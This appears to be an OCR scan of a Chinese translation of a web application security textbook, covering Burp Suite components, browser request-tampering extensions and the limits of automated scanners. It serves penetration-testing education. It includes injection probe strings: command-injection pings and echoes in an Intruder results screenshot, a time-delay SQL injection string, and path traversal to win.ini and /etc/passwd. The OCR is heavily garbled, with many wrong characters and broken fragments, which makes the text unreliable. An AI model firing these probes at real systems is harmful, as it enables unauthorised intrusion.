效 载荷 自 身 是 否 出 现 查 看 和 分 析 响 应 (参见 图 20-9) ° 


intruder attack 5 CD of) A 


stack save columns 
Filter; showing all ems 


resis | target positions payloads options 


0 200 1609 line i 
E 1 LSSIOSL 200 611 
lz 1 <100> 200 516 
3 1 ping4 700 200 1561 
4 1 echo 11111 200 1616 
ls 1 200 1580 Y v | | 
5 1 \ dows\.. 200 1637 
7 rsstest! 200 1609 
8 <foo> 200 609 
9 ping -i 30 127.0.0.... 200 1609 
10 edio 111111 200 609 
11 200 ERS Y Y 
it Liwindows\.. 200 1609 
request respor 
| raw cs Wm render 
name~"username” type="text” 全 
Evalue='in/><1zd><cd7anbaB ;</td></tr><tr><ta>Passwerd: </td><td><input 
nar "pavs a" type="pasaevord” values""/s-/ id» <td><input t a 
ralue="1 i »<ftd></t </table></form<br’><a 
Pheer" "Reqgieter.aghx">Register <br><br> CDr Unclosed quotation mark after the 


character string 
Incorrect syntax near 


图 20-9 {EH Burp Intruder 测 斌 漏洞 练习 的 结果 


a 从 应 用 程序 的 啊 应 中 提取 有 用 数据 的 功能 。 例 如 ， 从 “用 户 资 
料 ” 页 面 解析 用 户 名 和 密码 字段 。 当 利用 会 话 处 理 和 访问 控制 等 漏洞 时 
可 以 用 到 这 项 功能 。 

4. Web 漏 洞 扫描 器 

一 些 集成 测试 套件 提供 扫描 常见 Web 应 用 程序 漏洞 的 功能 ， 所 执 
行 的 扫描 主要 分 为 以 下 两 类 。 

口 被 动 扫 描 ， 包 括 监视 通过 本 地 代理 服务 器 传递 的 请 求 和 别 应 ， 
以 确定 各 种 漏洞 ， 如 提交 明文 密码 、cookie 配 置 错误 以 及 跨 域 Referer 
漆 露 。 可 以 以 非 入 侵 的 方式 对 使 用 浏览 絮 访 问 的 任何 应 用 程序 执行 此 
类 扫 摘 。 在 确定 渗透 测试 的 效果 时 ， 此 功能 往往 非常 有 用 ， 通 过 它 可 
以 确定 应 用 程序 相对 于 上 述 漏 洞 的 安全 状态 。 

口 主动 扫描 ， 包 括 向 目标 应 用 程序 发 送 请 求 来 探查 各 种 漏洞 ， 如 
跨 站 点 脚本 、HPPT 消 息 头 注入 和 文件 路 径 届 历 。 和 任何 其 他 主动 测试 
一 样 ， 此 类 测试 可 能 会 非常 危险 ， 只 有 在 获得 应 用 程序 所 有 者 的 同意 
后 才 可 以 实施 。 


相 比 于 本 章 后 面部 分 讨论 的 独立 扫 摘 器， 测试 侠 件 中 包含 的 漏洞 
扫描 硕 需 要 用 户 执行 更 多 配置 。 用 户 不 能 仅仅 提供 起 始 URL 并 主 扫 摘 
磺 抓 取 和 测试 应 用 程序 ， 相 反 ， 用 户 可 以 指示 扫描 硕 如 何 测试 应 用 程 
序 ， 精 确 控制 扫 搬 哪些 请 求 ， 并 收 到 有 关 单 个 请 求 的 实时 反馈 。 以 下 
征集 成 测试 套件 扫描 功能 的 一 些 典 型 用 法 。 

口 手 动 解析 应 用 程序 的 内 容 后 ， 可 以 选择 站 点 地 图 中 感 兴趣 的 功 
能 区 域 并 由 扫描 妖 扫 描 这 些 区 域 。 这 有 助 于 将 可 用 时 间 用 于 扫 搬 最 关 
键 的 区 域 ， 并 更 迅速 地 获得 扫描 结果 。 

口 手动 测试 单个 请 求 时 ， 作 为 补充 ， 可 以 在 测试 时 扫描 每 个 特定 
的 请 求 。 这 样 做 可 以 立即 获得 与 这 些 请 求 包含 的 音 见 漏洞 有 关 的 反 
疆 ， 从 而 为 手动 测试 提供 指导 并 对 其 进行 优化 。 

口 可 以 使 用 目 动 抓 取 工具 抓 取 鳌 个 应 用 程序 ， 然 后 扫描 发 现 的 所 
有 内 容 。 这 个 过 程 与 独立 Web 扫 描 峰 的 基本 行为 类 似 。 
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图 20-10 ”使 用 BurpScanner 浏 览 时 的 实时 扫描 结果 


虽然 集成 测试 套件 中 的 扫描 器 的 设计 用 途 不 同 于 独立 扫描 器 ， 但 
是 ， 我 们 将 在 本 章 后 面部 分 讲 到 ， 在 某 些 情况 下 ， 这 些 扫描 器 的 核心 
扫描 引擎 非常 强大 ， 其 能 力 甚 至 优 于 主流 的 独立 扫描 器 。 

5. 手动 请 求 工 具 

发 布 一 个 请 求 并 查看 它 的 响应 是 集成 测试 套件 中 的 手动 请 求 组 件 
的 基本 功能 。 虽 然 非常 简单 ， 但 在 以 下 情况 下 ， 这 项 功能 可 提供 极 大 
帮助 : 党 试 性 地 探查 一 个 漏洞 ， 需 要 多 次 手动 发 布 同一 个 请 求 ， 并 调 
整 请 求 元 素 以 确定 应 用 程序 的 行为 所 受到 的 影响 。 当 然 ， 也 可 以 使 用 
一 个 独立 的 工具 (如 Netcat) 来 完成 这 项 任务 。 但 是 ， 如 果 将 这 项 功 
能 内 置 在 套件 中 ， 就 可 以 迅速 从 其 他 组 件 (代理 服务 器 、 扑 虫 或 漏洞 
测试 器 ) 中 获取 感 兴趣 的 请 求 ， 对 其 进行 手动 调查 。 而 且 ， 手 动 请 求 


工具 还 可 以 得 益 于 套件 执行 的 各 种 共享 功能 ， 如 HTML 呈现、 文 持 下 
行 代理 (downstream proxy) 与 验证 、 自 动 上 传 Content-Length 消 息 
头 。 图 20-11 是 一 个 手动 重新 发 布 的 请 求 。 
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图 20-11 ”使 用 BurpRepeater 手 动 重新 发 布 的 请 求 


以 下 是 各 种 手动 请 求 工具 的 主要 功能 。 

口 与 其 他 套件 组 件 相互 整 合 ， 能 够 与 其 他 组 件 相 互 传递 任何 请 
求 ， 以 进行 深入 调查 。 

口 保存 所 有 请 求 与 啊 应 的 历史 记录 ， 完 整 记录 所 有 手动 请 求 ， 以 
方便 进一步 审查 。 同 时 还 能 够 获取 一 个 之 前 已 经 修改 的 请 求 ， 以 进行 
深入 分 析 。 

口 包含 多 个 选项 卡 的 界面 ， 一 次 可 以 处 理 几 个 不 同 的 项 目 。 

o JEW H DJERRI HEE H] ° 


6. 会 话 令 牌 分 析 器 
一 些 测试 套件 提供 各 种 分 析 功 能 ， 可 用 于 分 析 应 用 程序 使 用 的 需 
要 不 可 预见 性 的 会 话 cookie 和 其 他 令 牌 的 随机 性 。Burp Sequencer 是 一 
种 强大 的 工具 ， 可 以 对 任意 大 小 的 令 牌 样本 的 随机 性 进行 标准 的 统计 
测试 ， 并 以 可 访问 的 格式 提供 详细 结果 。 图 20-12 显 示 了 Burp 
Sequencer 工 具 ， 有 关 该 工具 的 详情 ， 请 参阅 第 7 章 。 
Wr (ero 
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4120-12 ”使 用 BurpSequencer 测 试 应 用 程序 会 话 令 牌 的 随机 性 


7. 共享 功能 与 实用 工具 

除 核心 组 件 外 ， 集 成 测试 套件 还 提供 大 量 其 他 “附加 值 ” 功 能 ， 以 
满足 渗透 测试 员 在 攻击 Web 应 用 程序 时 面临 的 特殊 需求 。 以 下 是 各 种 
套件 的 主要 功能 。 

口 分 析 HTTP 消 息 结 构 ， 包 括 解 析 消 妃 头 与 请 求 的 参数 ， 以 及 解压 
常见 序列 化 格式 ( 见 图 20-13) ° 
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图 20-13 分析 请 求 与 响应 的 HTTP 结 构 与 参数 


口 在 响应 中 呈现 HTML 内 容 ， 就 像 在 浏览 器 中 那样 。 

口 能 够 以 文本 和 十 六 进 制 格式 显示 和 编辑 消息 。 

口 所 有 请 求 与 响应 中 的 搜索 功能 。 

口 手 动 编辑 消息 内 容 后 ， 上 自动 上 传 HITP Content-Length 消 息 头 。 
口 内置 编 码 絮 与 解码 器 ， 能 够 迅速 分 析 cookie 与 请 求 参数 中 的 应 
序数 据 。 

口 比 较 两 个 响应 ， 突 出 显示 其 不 同 之 处 。 

口 自动 化 内 容 发 现 与 攻击 面 分 析 。 

口 能 够 在 磁盘 上 保存 当前 测试 会 话 ， 并 检索 已 保存 的 会 话 。 

口 支持 “下 行 ”" 代 理 和 SOCKS 代 理 ， 人 允许 将 不 同 的 工具 组 合 在 一 


起 ,或 者 通过 所 在 的 组 织 或 I1SP 使 用 的 代理 服务 器 访 问 应 用 程序 。 


口 在 工具 内 文 持 HTTP 验 证 方法 ， 人 允许 在 应 用 这 些 方 法 的 环境 (如 
业 局 域 网 ) 中 使 用 套件 的 所 有 功能 。 

口 文 持 客 户 端 SSL 证 书 ， 人 允许 攻击 使 用 这 些 证 书 的 应 用 程序 。 

口 处 理 更 隐蔽 的 HITP 特 性 ， 如 gzip 内 容 编码 、 块 传输 编码 与 状态 


码 为 100 的 过 小 啊 应 。 


口 可 扩展 性 ， 使 用 第 三 方 代 码 可 任意 修改 和 扩展 内 置 功能 。 
口 可 以 安排 各 种 音 规 任务 ， 如 抓 取 和 扫 搞 ， 而 无 须 手 动 控 制 。 
口 保 留 工具 选项 配置 ， 帮 助 在 下 次 运行 套件 时 恢复 到 某 个 特殊 设 


口 乎 台独 立 性 ， 可 在 所 有 名 用 操作 系统 上 运行 这 些 工 具 。 


20.2.2 ”测试 工作 流程 


使 用 集成 测试 套件 的 典型 工作 流程 如 图 20-14 所 示 。 每 个 测试 阶段 
所 涉及 的 关键 步骤 将 在 整 本 书 中 详细 介绍 ， 并 在 第 21 章 的 方法 论 中 列 
出 。 此 处 介绍 的 工作 流程 说 明了 测试 套件 的 不 同 组 件 与 该 方法 论 之 间 
的 对 应 关系 。 
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图 20-14 ”使 用 集成 测试 套件 的 典型 工作 流程 


在 此 工作 流程 中 ， 测 试 员 将 使 用 浏览 妖 推 动 整 个 测试 流程 。 在 通 
过 拦截 代理 服务 器 浏 哎 应 用 程序 时 ， 测 试 套件 将 编译 以 下 两 类 关键 信 


/ FA 


: A ee 记录 通过 代理 服务 器 传送 的 每 一 个 请 求 
HEA © 
口 站 点 地 图 ， 记 录 在 目标 的 目录 树 视 图 中 发 现 的 所 有 项 目 。 
(注意 ， 在 以 上 两 种 情况 下 ， 显 示 器 的 默认 过 滤器 可 能 会 隐藏 某 
些 通常 在 测试 时 没有 用 处 的 项 目 。) 

如 第 4 章 所 述 ， 在 测试 应 用 程序 时 ， 测 试 套件 通常 会 对 发 现 的 内 容 
进行 被 动 抓 取 。 这 一 操作 将 使 用 通过 代理 服务 器 传送 的 所 有 请 求 更 新 
站 点 地 图 ， 并 添加 基于 代理 服务 器 传送 的 响应 确定 (通过 解析 链接 、 
表单 、 脚 本 等 ) 的 项 目 。 使 用 浏览 器 手动 确定 应 用 程序 的 可 见 内 容 
后 ， 还 可 以 使 用 “爬虫 和“ 内容 查 找 ? 功 能 主动 探查 应 用 程序 的 其 他 内 
容 。 这 些 工具 的 输出 表单 也 将 添加 到 站 点 地 图 中 。 

解析 应 用 程序 的 内 容 和 功能 后 ， 驶 可 以 开始 评估 它 的 受 攻 击 面 。 
受 攻击 面 是 各 种 功能 和 请 求 的 集合 ， 测 试 员 应 对 其 进行 仔细 检查 ， 以 
竹 试 发 现 和 利用 相关 漏洞 。 

通常 ， 在 测试 漏洞 时 ， 可 以 从 代理 服务 器 拦截 窗口 、 代 理 服务 器 
历史 记录 或 站 点 地 图 中 选择 项 目 ， 然 后 将 这 些 项 目 传 送 给 其 他 工具 ， 
以 执行 特定 的 任务 。 如 前 所 述 ， 可 以 使 用 模糊 测试 探查 基于 输入 的 漏 
洞 ， 并 实施 其 他 攻击 ， 如 截取 敏感 信息 ; 可 以 通过 漏洞 扫描 帮 使 用 被 
动 和 主动 技巧 自动 查找 常见 漏洞 ， 可 以 使 用 令 有 牌 分 析 絮 工具 测试 会 话 
cookie 和 其 他 令 牌 的 随机 性 ;还 可 以 使 用 请 求 Repeater 修 改 单个 请 求 ， 
然后 不 断 提 出 这 个 请 求 ， 以 探查 漏洞 或 利用 已 发 现 的 缺陷 。 通 常 ， 测 
试 员 需 要 在 这 些 不 同 的 工具 之 间 来 回 传送 各 个 项 目 。 例 如 ， 测 试 员 可 
以 从 模糊 测试 攻击 中 选择 某 个 感 兴趣 的 项 目 ， 或 选择 由 漏洞 扫 摘 需 报 
告 的 问题 ， 并 将 其 传送 给 请 求 Repeater， 以 验证 漏洞 是 否 存在 ， 或 对 
攻击 进行 优化 。 

通常 ， 对 于 许多 类 型 的 漏洞 ， 测 试 员 需要 返回 浏 贤 右 以 作 进 一 步 
调查 ， 确 认 某 个 明显 的 漏洞 是 否 确实 存在 ， 或 测试 正在 进行 的 攻击 。 
例如 ， 使 用 漏洞 扫 摘 需 或 请 求 Repeater 发 现 跨 站 点 脚本 漏洞 后 ， 可 以 
将 生成 的 UREL 粘 贴 到 浏 贤 右 中 ， 以 确认 概念 验证 攻击 是 否 会 执行 。 测 
试 可 能 的 访问 控制 漏洞 时 ， 可 以 查看 当前 浏览 絮 会 话 中 特定 请 求 的 结 
果 ， 以 在 特定 用 户 权 限 下 确认 这 些 结果 。 如 果 发 现 可 用 于 提取 大 量 信 
妃 的 SQL 注入 漏洞 ， 浏 览 右 是 显示 相关 结果 的 最 有 利 的 位 置 。 

测试 员 并 不 需要 严格 遵循 本 节 介 绍 的 工作 流程 ， 也 不 应 受到 该 流 
程 的 任何 限制 。 在 许多 情况 下 ， 可 以 直接 在 浏 唤 辟 或 代理 服务 如 拦截 
窗口 中 输入 意外 输入 来 测试 漏洞 。 一 些 漏洞 可 能 会 立即 在 请 求 和 响应 


中 表露 出 来 ， 而 无 须 使 用 任何 更 具 针 对 性 的 工具 。 为 实现 特定 的 目 
的 ， 可 以 引入 其 他 工具 ， 还 可 以 以 本 节 并 未 介绍 的 创新 性 方式 ， 甚 至 
连 工 具 开 发 者 都 未 想到 的 方式 组 合 使 用 测试 套件 的 各 个 组 件 。 利 用 各 
种 相互 关联 的 特性 ， 集 成 测试 套件 可 发 挥 非常 强大 的 功能 。 在 使 用 它 
们 时 越 有 创造 性 ， 融 越 有 可 能 发 现 最 隐秘 的 漏洞 。 


20.2.3 “拦截 代理 服务 器 替代 工具 


应 该 在 工具 包 中 始终 保留 一 个 工具 ， 以 备 在 极 少数 常用 的 基于 代 
理 服务 絮 的 工具 无 法 使 用 的 情况 下 使 用 。 在 需要 使 用 非 标准 的 验证 方 
法 直接 或 通过 企业 代理 服务 絮 访 问 应 用 程序 ， 或 者 应 用 程序 使 用 不 常 
用 的 客户 问 SSL 证 书 或 浏览 絮 扩 展 时 ， 往 往 需 要 使 用 替代 工具 。 在 这 
些 情 况 下 ， 因 为 拦截 代理 服务 器 会 中 断 客 户 端 与 服务 絮 之 则 的 HTTP 连 
接 
部 功能 。 

这 时 ， 常 规 的 蔡 代 方法 是 使 用 内 骸 在 浏览 絮 内 的 工具 监控 和 操纵 
浏览 絮 生 成 的 HTTP 请 求 。 从 理论 上 讲 ， 此 时 客户 端 执行 的 全 部 操作 以 
及 同 服 务 恬 提交 的 所 有 数据 ， 仍 然 由 测试 员 完 全 控制 。 如 果 希 望 拥 有 
控制 权 ， 可 以 编写 完全 定制 的 浏览 絮 来 执行 所 需 的 任何 任务 。 使 用 这 
些 浏 蜗 絮 扩展 的 目的 在 于 帮助 标准 浏 贤 絮 迅速 高 效 地 实现 其 功能 ， 而 

` 会 干扰 浏 贤 絮 与 服务 絮 之 间 的 网 络 层 通 信 。 因 此 ， 测 试 员 可 以 通过 
这 种 方法 同 应 用 程序 提交 任意 请 求 ， 同 时 使 用 浏 贤 妮 与 存在 问题 的 应 
用 程序 进行 正常 通信 。 

Internet Explorer 与 Firefox 都 有 大 量 扩 展 ， 它 们 的 功能 基本 相似 。 
我 们 将 分 别 举 出 一 个 示例 ， 同 时 也 建议 测试 员 首 先 试用 各 种 扩展 ， 然 
后 再 从 中 选择 最 适合 自己 的 一 种 。 

还 要 注意 ， 与 主要 的 工具 套件 相 比 ， 当 前 浏览 絮 扩 展 的 功能 
限 。 它 们 不 能 进行 任何 抓 取 、 模 糊 测 试 或 漏洞 扫描 ， 而 旦 使 用 它们 必 
须 完全 手动 操作 。 但 是 ， 在 某 些 情况 下 仍然 需要 使 用 它们 ， 因 为 它们 
E HER EHBE AEREN oe aS CIA SLA TA 
攻击 。 

1. Tamper Data 

Tamper Data 是 一 个 Firefox 浏 贤 器 扩展 。 任 何 时 候 ， 只 要 提交 一 个 

表单 ，Tamper Data 就 会 弹出 一 个 对 话 框 ， 显 示 与 请 求 有 关 的 所 有 信息 
(包括 HTTP 消 息 头 与 参数 ) ， 并 人 允许 查看 和 修改 这 些 内 容 ， 如 图 20- 
15 所 示 。 


ists ~ suo 


http://mdsez.net/search/11/Default.aspx 
Request Header Name Request Header Value Post Parameter Name Post Parameter Value 
Host mdsec.net 
User-Agent Mazilla/5.0 (Windows NT 6.1; 
Accept text/html application/xhtml+ 
Accept-Language en-gb,encqa0.5 
gzip, deflate 
IS0-8859-1utf-8:q=0.7,":q=0 
115 


keep-alive 


htp/ mdere net/enarch/11/ 


图 20-15 ”在 Firefox 中 使 用 TamperData 修 改 HTTP 请 求 


2. TamperlE 
TamperIE 是 一 个 Internet Explorer} bias) Je, CDE Firefox 
iM biawHTamper Data 扩 展 的 功能 基本 相同 ， 如 图 20-16 所 示 。 


TamperE -~ Edit Request 


~ 


w$- Internet Explorer is attempiing to send data to the following page: J: 
> — nttps//mdeec.net/cearch/11/Defauit aspx 
wacked, You may tamper with this data using this dalog, 


Send ghered data 


> Send origina! dat: 
Configure this tool... AK Send original data 


Raw POST tyPOST | 


120-16 7£Internet Explorer P fE 


TamperIFE 修 改 HTTP 请 3 


有 许多 工具 可 目 动 对 Web 应 用 程序 进行 漏洞 扫描 。 这 些 扫描 硕 的 
主要 优点 是 ， 能 够 在 相对 较 短 的 时 间 内 测试 大 量 功能 ， 并 且 能 够 发 现 
常见 应 用 程序 中 存在 的 各 种 重要 漏洞 。 

Web 应 用 程序 漏洞 扫 摘 硕 能 够 目 动 执行 本 书 中 介绍 的 各 种 测试 技 
巧 ， 包 括 应 用 程序 抓 取 ， 碍 找 黑 认 与 常见 内 容 ， 以 及 探查 常见 的 漏 
洞 。 在 解析 应 用 程序 的 内 容 后 ， 扫 摘 融 将 浏览 它 的 功能 ， 在 每 个 请 求 
的 每 一 个 参数 中 提交 一 系列 测试 字符 哩 ， 然 后 分 析 应 用 程序 的 啊 应 ， 
从 中 得 找 利 见 漏洞 的 签名 。 接 下 来 ， 扫 描 硕 生成 一 个 报告 ， 描 述 它 发 
现 的 每 一 个 漏洞 。 通 常 ， 这 份 报告 中 包括 用 于 诊断 每 一 个 被 发 现 的 漏 
洞 的 请 求 与 啊 应 ， 人 允许 经 验 丰 富 的 用 户 对 它们 进行 手动 调查 ， 确 认 源 
MERTE ° 
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具 的 内 在 优 缺 点 与 在 开发 它们 的 过 程 中 面临 的 挑战 。 这 些 考虑 事项 还 


会 影响 能 否 充 分 利用 一 个 目 动 扫描 妖 ， 以 及 如 何 解释 与 是 否 信 任 它 的 
扫描 结果 。 


使 用 扫描 右 可 以 相当 可 靠 地 探测 到 几 种 常见 的 漏洞 。 这 些 漏 洞 都 
有 非常 明显 的 签名 。 有 些 情 况 下 ， 这 些 签名 吏 在 应 用 程序 的 常见 请 求 
与 啊 应 中 。 还 有 些 情况 下 ， 如 果 确 定 漏 洞 已 经 存在 ， 扫 描 需 会 发 送 一 
个 专门 设计 的 请 求 ， 以 触发 它 的 签名 。 如 果 签 名 出 现在 应 用 程序 对 这 
个 请 求 的 啊 应 中 ， 那 么 扫描 颖 就 可 据 此 推断 ， 漏 洞 确 实 存 在 。 

下 面 列 出 几 个 可 以 通过 这 种 方法 探测 到 的 漏洞 。 

口 反 射 型 跨 站 点 脚本 漏洞 。 如 果 用 户 提交 的 输入 未 经 过 适当 的 净 
化 ， 在 应 用 程序 的 啊 应 中 “反射 ?回来 ， 丈 会 出 现 这 种 漏洞 。 目 动 扫描 
屁 通 常会 发 送 包 售 HTML 标 记 的 测试 字符 串 ， 然 后 在 啊 应 中 搜索 这 些 
字符 串 ， 从 而 确定 许多 这 种 类 型 的 漏洞 。 

口 一 些 SQL 注 入 漏洞 可 通过 某 个 签名 确定 。 例 如 ， 提 交 一 个 单 引 
号 可 能 会 导致 应 用 程序 返回 一 条 ODBC 错 误 消 息 ; 或者， 提交 字符 串 '; 
waitfor delay ‘0:0:30’-- 可 能 会 造成 时 间 延 迟 。 


口 一 些 路 径 裔 历 漏洞 可 通过 提交 一 个 针对 某 个 已 知 文件 (如 
win.ini 或 /etc/passwd) 的 遍历 序列 ， 然 后 在 请 求 中 搜索 该 文件 是 否 
现 ， 从 而 进行 确定 。 

口 一 些 命令 注入 漏 润 可 通过 注入 一 个 引起 时 间 延 迟 ， 或 者 将 某 个 
特殊 的 字符 串 “ 反 射 到 应 用 程序 的 啊 应 中 的 命令 确定 。 

口 直 接 目 永 列表 可 通过 请 求 目 孙 路 径 ， 然 后 寻找 一 个 包含 看 似 为 
目录 列表 的 文本 的 响应 ， 从 而 加 以 确定 。 

口 明 文 密码 提交 、 范 围 宽泛 的 cookie、 激 活 自 动 完 成 的 表单 等 漏 
洞 可 通过 审查 应 用 程序 提出 的 常见 请 求 与 啊 应 有 效 确定 。 

口 通常 ， 使 用 不 同 的 文件 扩展 名 请 求 每 个 枚 举 出 的 资产， 可 以 发 
a 


对 上 面 的 许多 漏洞 而 言 ， 有 时 候 ， 使 用 一 个 标准 的 攻击 子 符 串 和 
签名 无 法 有 效 探测 到 相同 类 型 的 漏洞 。 例 如 ， 为 阻止 基于 输入 的 漏 
洞 ， 应 用 程序 会 执行 某 种 使 用 专门 设计 的 输入 即 可 避 开 的 不 完善 的 输 
入 确认 。 普 通 的 攻击 字符 串 将 被 阻止 或 净化 ; (Ee, AP 
者 能 够 探查 到 应 用 程序 实施 的 输入 确认 ， 并 找到 避 开 这 种 确认 的 方 
法 。 其 他 情况 下 ， 标 准 的 攻击 字符 串 可 能 会 触发 一 个 漏洞 ， 但 不 会 生 
成 想 妥 的 签名 。 例 如 ， 许 多 SQL 注入 攻击 并 不 会 导致 应 用 程序 同 用 户 
返回 任何 数据 或 错误 消息 ， 同 样 ， 路 径 避 历 漏 润 也 不 会 让 目标 文件 的 
内 容 在 应 用 程序 的 啊 应 中 直接 返回 。 

此 外 ， 有 几 种 重要 的 漏洞 并 没有 明确 的 签名 ， 使 用 一 组 标准 的 攻 
击 字 符 串 也 无 法 发 现 它 们 。 通 常 ， 目 动 扫描 需 并 不 能 发 现 这 种 类 型 的 
漏洞。 下面 征 一 些 扫 描 硕 无 法 准确 判定 的 漏洞 。 

口 不 完善 的 访问 控制 。 这 种 漏洞 可 使 用 户 能 够 访问 其 他 用 户 的 数 
据 ， 或 者 允许 低 权 限 用 户 访问 管理 功能 。 扫 摘 釉 不 了 解 应 用 程序 的 访 
问 控制 要 求 ， 也 不 能 评估 使 用 任何 特殊 的 用 户 账户 发 现 的 各 种 功能 和 
数据 的 重要 性 。 

口 通 过 修改 参数 值 给 应 用 程序 的 行为 造成 影响 的 攻击 。 例 如 ， 修 
改 一 个 表示 商品 价格 或 订单 状态 的 隐藏 字段 。 扫 接 右 并 不 了 解 任何 参 
数 在 实现 应 用 程序 功能 过 程 中 所 发 挥 的 作用 。 

口 其 他 逻辑 错误 ， 如 使 用 负 值 突破 交易 限额 ， 或 者 通过 省 略 一 个 
关键 的 请 求 参数 避 开 账户 恢复 过 程 的 某 个 阶段 。 

口 应 用 程序 功能 设计 方面 的 漏洞 ， 如 脆弱 密码 强度 规则 ， 从 登录 
失败 消 妃 中 枚 举 用 户 的 功能 ， 以 及 保密 性 不 强 的 未 记 密码 提示。 


口 会 话 支持 攻击 。 攻 击 者 可 在 应 用 程序 的 会 话 令 牌 中 找到 一 个 序 
列 ， 伪 闭 成 其 他 用 户 。 即 使 扫描 大 能 确定 某 个 参数 在 连续 登录 过 程 中 
使 用 了 一 个 可 以 预测 的 值 ， 但 它 仍 然 不 能 理解 修改 该 参数 导致 出 现 的 
不 同 内 容 的 意义 。 

口 泄露 敏感 信息 ， 如 用 户 名 列表 和 包含 会 话 令 牌 的 日 志 。 

一 些 漏洞 扫 拉 妖 壬 试 检查 上 述 某 些 漏洞 。 例 如 ， 某 些 扫 搬 絮 壬 试 
以 两 个 不 同 的 用 户 喘 份 登 录 ， 并 确定 一 名 用 户 无 须 正 确 授 权 即 可 访问 
的 数据 和 功能 ， 以 此 确定 访问 控制 漏洞 。 根 据 笔者 的 经 验 ， 这 些 类 型 
的 检查 通 间 会 生成 大 量 错 误 警 报 和 调 报 。 

在 前 面 列 出 的 两 组 漏洞 中 ， 每 一 组 都 包含 明显 的 漏洞 ， 也 就 是 那 
些 可 被 技术 疝 不 熟练 的 攻击 者 发 现 和 利用 的 漏洞 。 因 此 ， 虽 然 目 动 扫 
描 帮 能 够 探查 到 应 用 程序 中 存在 的 大 部 分 明显 的 调 洞 ， 但 它 还 是 会 租 
漏 许 多 这 类 漏洞 ， 其 中 包括 一 些 非 党 明显 的 漏洞 ， 只 要 进行 手动 扫 摘 
即 可 探测 到 。 目 动 扫 摘 万 根本 不 能 提供 任何 保证 ， 证 明 应 用 程序 中 不 
存在 一 些 可 被 攻击 者 轻易 发 现 和 利用 的 广 重 漏洞 。 

同样 ， 对 于 当前 必须 经 过 严格 测试 的 、 更 注重 安全 的 应 用 程序 而 
PA o a eee Ve 

J 漏洞 。 


20.3.2 扫描 器 的 j| 
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能 有 效 发 现 许多 类 型 的 漏洞 。 要 设计 一 个 完全 目 动 化 的 Web 应 用 程序 
测 斌 方法， 我们 面临 着 各 种 内 在 的 障碍 。 只 有 拥有 成 熟 的 人 工 乔 能 引 
敬 ， 远 远 超 越 当前 扫描 絮 性 能 的 系统 ， 才 能 有 效 突破 这 些 障 碍 。 

1. Web 应 用 程序 各 不 相同 

Web 应 用 程序 与 网 络 和 基础 架构 截然 不 同 。 通 前 ， 后 者 大 多 采用 
标准 配置 的 非 定制 产品 。 从 理论 上 讲 ， 我 们 可 以 提前 为 所 有 可 能 的 目 
标 构建 一 个 数据 库 ， 然 后 创建 一 个 工具 探查 网 络 和 基础 架构 中 存在 的 
漏洞 。 但 古 ， 我 们 却 不 能 以 这 种 方式 探查 定制 Web 应 用 程序 中 的 漏 
lel; 因此 ， 任 何 高 效 的 扫描 需 必须 能 够 预见 意外 的 情况 。 

2. 扫描 器 不 理解 语法 

计算 机 擅长 分 析 应 用 程序 响应 的 语法 内 容 ， 能 够 识别 常见 的 错误 
消息 、HTTP 状 态 码 与 被 复制 到 Web 页 面 中 的 用 户 提交 的 数据 。 然 而 ， 
今天 的 扫描 硕 并 不 能 理解 这 些 内 容 的 语法 意义 ， 也 不 能 根据 这 些 意 义 


做 出 合理 的 判断 。 例 如 ， 在 更 新 购物 篮 的 功能 中 ， 扫 摘 右 能 够 查看 所 
交 给 该 功能 的 大 量 参数 。 扫 摘 套 并 不 知道 哪个 参数 表示 数量 ， 哪 个 参 
数 表示 价格 。 另 外 ， 它 也 不 能 判定 修改 订单 的 数量 并 不 符合 逻辑 ， 而 
可 修改 其 价格 则 代表 一 个 产 重 的 漏洞 。 
3. 扫描 器 不 会 < 即兴 ”处 理 

许多 Web 应 用 程序 使 用 非 标准 的 机 制 处 理会 话 与 导航 ， 传 送 和 处 
理 数据 ， 例 如 ， 通 过 查询 字符 串 、cookie 或 其 他 参数 。 人 类 立即 能 够 
注意 到 并 解析 这 些 不 利用 的 机 制 ， 但 计算 机 会 继续 遵循 它 的 标准 规 
则 。 而 且 ， 许 多 针对 Web 应 用 程序 的 攻击 需要 某 种 "即兴 ”处 理 ， 例 
如 ， 部 分 避 开 有 效 的 输入 过 滤 ， 或 者 利用 应 用 程序 行为 的 儿 个 不 同方 
面 为 攻击 创造 条 件 。 通 党， 扫 拉 需 没有 能 力 实施 这 些 攻击 。 
4. 扫描 器 并 无 直觉 

计算 机 并 不 能 赁 直觉 发 现 最 佳 的 攻击 方法 。 今 天 的 扫 搬 颖 采用 的 
攻击 方法 ， 是 对 每 一 项 功能 答 试 每 一 种 攻击 。 这 种 方法 在 所 能 执行 的 
检查 种 类 以 及 组 合 这 些 检查 的 方式 上 存在 着 诸多 限制 。 在 许多 情况 
下 ， 这 种 方法 往往 会 忽略 漏洞 的 存在 ， 如 下 所 示 。 

口 一 些 攻击 需要 在 一 个 多 阶段 处 理 过 程 的 一 个 或 几 个 阶段 提交 专 
门 设 计 的 输入 ， 然 后 完成 整个 处 理 过 程 ， 并 观察 处 理 结 采 。 

口 一 些 攻 击 需 要 改变 应 用 程序 执行 某 个 多 阶段 处 理 的 预定 顺序 。 

口 一 些 攻 击 需要 以 专门 设计 的 方式 修改 多 个 参数 的 值 。 例 如 ， 一 
个 XSS 攻 击 需要 在 一 个 参数 中 插入 一 个 特殊 的 值 ， 使 得 应 用 程序 生成 
错误 消 忌 ， 并 在 为 一 个 参数 中 插入 被 复制 到 错误 消 居 中 的 XSS 有 效 载 
荷 。 

由 于 扫描 万 所 使 用 的 探 碍 漏洞 的 槛 力 方 法 存在 的 实际 限制 ， 它 们 
并 不 能 向 每 一 个 参数 或 者 每 一 个 处 理 阶段 提交 所 有 攻击 字符 串 。 当 
然 ， 也 没有 人 能 够 做 到 这 一 点 ， 但 是 ， 人 类 往往 能 够 “ 察 沉 ”可 能 存在 
的 漏洞 、 开 发 者 做 出 的 某 种 假设 以 及 似乎 有 什么 不 太 正 常 的 位 置 。 因 
此 ， 渗 透 测试 员 会 选择 这 一 小 部 分 可 能 的 攻击 进行 实际 调查 ， 并 且 通 
党 能够 成 功 发 现 漏 洞 。 


20.3.3 “扫描 器 面临 的 技术 挑战 


前 面 介绍 的 目 动 控制 面临 的 障碍 导致 创建 一 个 有 效 的 漏洞 扫 摘 右 
必须 解决 许多 特殊 的 技术 挑战 。 这 些 挑战 不 仅 会 损害 扫描 需 控 碍 某 些 
类 型 的 漏洞 的 能 力 《如 前 所 述 ) ， 而 且 会 损害 它 执行 解析 应 用 程序 内 
容 、 探 碍 漏洞 等 核心 任务 的 能 力 。 


